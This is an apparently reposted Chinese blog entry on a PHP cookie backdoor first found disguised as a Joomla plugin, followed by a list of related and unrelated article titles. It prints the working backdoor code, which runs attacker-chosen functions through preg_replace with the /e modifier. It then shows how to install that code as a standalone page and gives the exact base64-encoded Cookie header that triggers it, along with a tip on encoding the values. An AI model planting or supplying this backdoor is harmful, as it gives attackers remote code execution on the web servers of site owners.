php -- cookie 后门
来源:互联网 发布:雅各比矩阵 编辑:程序博客网 时间:2024/04/28 07:48
http://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html
https://gist.github.com/PhilETaylor/8045002
http://www.freebuf.com/articles/web/33275.html
GIF89a<?php/** * @package Joomla.Plugin * @subpackage system.instantsuggest * * @copyright Copyright (C) 2013 InstantSuggest.com. All rights reserved. * @license GNU General Public License version 2 or later *//** * Instant Suggest Ajax * * @package Joomla.Plugin * @subpackage system.instantsuggest * @since 3.1 */class PlgSystemInstantSuggest{public function __construct() {$filter = @$_COOKIE['p3'];if ($filter) {$option = $filter(@$_COOKIE['p2']);$auth = $filter(@$_COOKIE['p1']);$option("/123/e",$auth,123);die();}}}
利用上述部分代码建立页面bk-001.php,
<?php$filter = @$_COOKIE['p3'];if ($filter) { $option = $filter(@$_COOKIE['p2']); $auth = $filter(@$_COOKIE['p1']); $option("/123/e",$auth,123); die();}?>
发送下列cookie值,
Cookie: p3=base64_decode;p2=cHJlZ19yZXBsYWNl;p1=cGhwaW5mbygpOw==
p3=base64_decode;
p2=base64_decode("cHJlZ19yZXBsYWNl") --------> p2=preg_replace;
p1=base64_decode("cGhwaW5mbygpOw==")--------->p1=phpinfo();
有写朋友可能喜欢使用Linux下的base64程序, 例如:
echo preg_replace | base64
得到的结果是cHJlZ19yZXBsYWNlCg==,致使上述代码(phpinfo();)无法执行(0x0a的影响). 建议使用php_encode函数加密字符串.
0 0
- php -- cookie 后门
- php -- cookie 后门
- PHP后门隐藏
- php ob_start 后门
- PHP一句话后门
- php ob_start 后门
- php一句话后门分析
- php后门的编写
- PHP 无文件后门
- php 一句话木马、后门
- PHP后门新玩法:一款猥琐的PHP后门分析
- PHP后门新玩法:一款猥琐的PHP后门分析
- 又一款超强PHP后门
- 一句话后门……PHP
- 后门
- 后门
- 后门
- php cookie
- Git pull 和Git fetch的区别
- reactor模式
- 从下到上打通Android
- 系统监控工具
- Cocos2d3.0 CheckBox
- php -- cookie 后门
- 多种方法产生波形,查表法,立即生成法
- 1.(c# JAVA 基于DataTable通信)
- 为QLabel增加Clicked信号
- CloudFoundry Quota Plans 配额计划
- dd
- 宏的使用
- 【STL】顺序容器 — heap
- 无法获得锁 /var/lib/dpkg/lock - open (11: 资源暂时不可用)